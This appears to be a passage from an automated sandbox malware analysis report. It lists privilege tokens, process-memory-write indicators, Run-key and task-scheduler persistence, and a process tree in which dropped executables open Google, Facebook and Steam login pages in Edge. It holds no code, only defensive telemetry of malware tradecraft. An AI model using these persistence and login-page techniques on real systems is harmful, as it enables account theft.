Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeDebugPrivilege	7488	52A0.exe
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE

Suspicious use of FindShellTrayWindow 30 IoCs

pid	Process
4396	1om77Gk1.exe
4396	1om77Gk1.exe
4396	1om77Gk1.exe
4396	1om77Gk1.exe
4396	1om77Gk1.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
4396	1om77Gk1.exe
4396	1om77Gk1.exe
4396	1om77Gk1.exe
4396	1om77Gk1.exe
4396	1om77Gk1.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
7012	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3852 wrote to memory of 760	3852	06e964d72a34dc9e1cc80e3a8fe9bdeb.exe	88
PID 3852 wrote to memory of 760	3852	06e964d72a34dc9e1cc80e3a8fe9bdeb.exe	88
PID 3852 wrote to memory of 760	3852	06e964d72a34dc9e1cc80e3a8fe9bdeb.exe	88
PID 760 wrote to memory of 4396	760	NO9ll22.exe	89
PID 760 wrote to memory of 4396	760	NO9ll22.exe	89
PID 760 wrote to memory of 4396	760	NO9ll22.exe	89
PID 4396 wrote to memory of 2896	4396	1om77Gk1.exe	91
PID 4396 wrote to memory of 2896	4396	1om77Gk1.exe	91
PID 4396 wrote to memory of 3148	4396	1om77Gk1.exe	93
PID 4396 wrote to memory of 3148	4396	1om77Gk1.exe	93
PID 4396 wrote to memory of 5060	4396	1om77Gk1.exe	94
PID 4396 wrote to memory of 5060	4396	1om77Gk1.exe	94
PID 4396 wrote to memory of 2900	4396	1om77Gk1.exe	95
PID 4396 wrote to memory of 2900	4396	1om77Gk1.exe	95
PID 4396 wrote to memory of 4844	4396	1om77Gk1.exe	96
PID 4396 wrote to memory of 4844	4396	1om77Gk1.exe	96
PID 4396 wrote to memory of 3416	4396	1om77Gk1.exe	97
PID 4396 wrote to memory of 3416	4396	1om77Gk1.exe	97
PID 4396 wrote to memory of 3872	4396	1om77Gk1.exe	98
PID 4396 wrote to memory of 3872	4396	1om77Gk1.exe	98
PID 4396 wrote to memory of 2524	4396	1om77Gk1.exe	99
PID 4396 wrote to memory of 2524	4396	1om77Gk1.exe	99
PID 3416 wrote to memory of 5040	3416	msedge.exe	100
PID 3416 wrote to memory of 5040	3416	msedge.exe	100
PID 2524 wrote to memory of 4220	2524	msedge.exe	107
PID 2524 wrote to memory of 4220	2524	msedge.exe	107
PID 2896 wrote to memory of 1244	2896	msedge.exe	103
PID 2896 wrote to memory of 1244	2896	msedge.exe	103
PID 5060 wrote to memory of 4576	5060	msedge.exe	102
PID 5060 wrote to memory of 4576	5060	msedge.exe	102
PID 3872 wrote to memory of 2256	3872	msedge.exe	108
PID 3872 wrote to memory of 2256	3872	msedge.exe	108
PID 3148 wrote to memory of 5024	3148	msedge.exe	109
PID 3148 wrote to memory of 5024	3148	msedge.exe	109
PID 2900 wrote to memory of 3604	2900	msedge.exe	101
PID 2900 wrote to memory of 3604	2900	msedge.exe	101
PID 4396 wrote to memory of 4996	4396	1om77Gk1.exe	106
PID 4396 wrote to memory of 4996	4396	1om77Gk1.exe	106
PID 4844 wrote to memory of 2224	4844	msedge.exe	105
PID 4844 wrote to memory of 2224	4844	msedge.exe	105
PID 4996 wrote to memory of 2684	4996	msedge.exe	104
PID 4996 wrote to memory of 2684	4996	msedge.exe	104
PID 4396 wrote to memory of 4804	4396	1om77Gk1.exe	110
PID 4396 wrote to memory of 4804	4396	1om77Gk1.exe	110
PID 4804 wrote to memory of 4488	4804	msedge.exe	111
PID 4804 wrote to memory of 4488	4804	msedge.exe	111
PID 760 wrote to memory of 2740	760	NO9ll22.exe	112
PID 760 wrote to memory of 2740	760	NO9ll22.exe	112
PID 760 wrote to memory of 2740	760	NO9ll22.exe	112
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115
PID 5060 wrote to memory of 5428	5060	msedge.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152
- C:\Users\Admin\AppData\Local\Temp\06e964d72a34dc9e1cc80e3a8fe9bdeb.exe
  "C:\Users\Admin\AppData\Local\Temp\06e964d72a34dc9e1cc80e3a8fe9bdeb.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3852
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NO9ll22.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NO9ll22.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:760
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1om77Gk1.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1om77Gk1.exe
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4396
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2896
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:1244
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,1293649390587166844,1236734794645233665,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5676
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,1293649390587166844,1236734794645233665,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
        6⤵
        
        PID:5668
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3148
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:5024
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,16186815754384881738,15112597276331993913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,16186815754384881738,15112597276331993913,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        6⤵
        
        PID:6032
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5060
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:4576
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,3449378066915661187,329919893260420708,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1964 /prefetch:2
        6⤵
        
        PID:5428
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,3449378066915661187,329919893260420708,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5556
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2900
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:3604
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5592
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
        6⤵
        
        PID:5584
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
        6⤵
        
        PID:5844
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
        6⤵
        
        PID:5704
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
        6⤵
        
        PID:5352
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
        6⤵
        
        PID:6936
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:1
        6⤵
        
        PID:7020
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:1
        6⤵
        
        PID:7616
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
        6⤵
        
        PID:7692
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
        6⤵
        
        PID:7764
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
        6⤵
        
        PID:7976
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
        6⤵
        
        PID:8176
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
        6⤵
        
        PID:7180
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
        6⤵
        
        PID:7200
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
        6⤵
        
        PID:3476
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
        6⤵
        
        PID:6944
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
        6⤵
        
        PID:4952
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9036 /prefetch:1
        6⤵
        
        PID:5604
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9004 /prefetch:1
        6⤵
        
        PID:1100
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9580 /prefetch:8
        6⤵
        
        PID:8076
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9580 /prefetch:8
        6⤵
        
        PID:5128
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9688 /prefetch:1
        6⤵
        
        PID:6508
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9956 /prefetch:1
        6⤵
        
        PID:4940
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9312 /prefetch:1
        6⤵
        
        PID:8136
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7788 /prefetch:8
        6⤵
        
        PID:5440
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
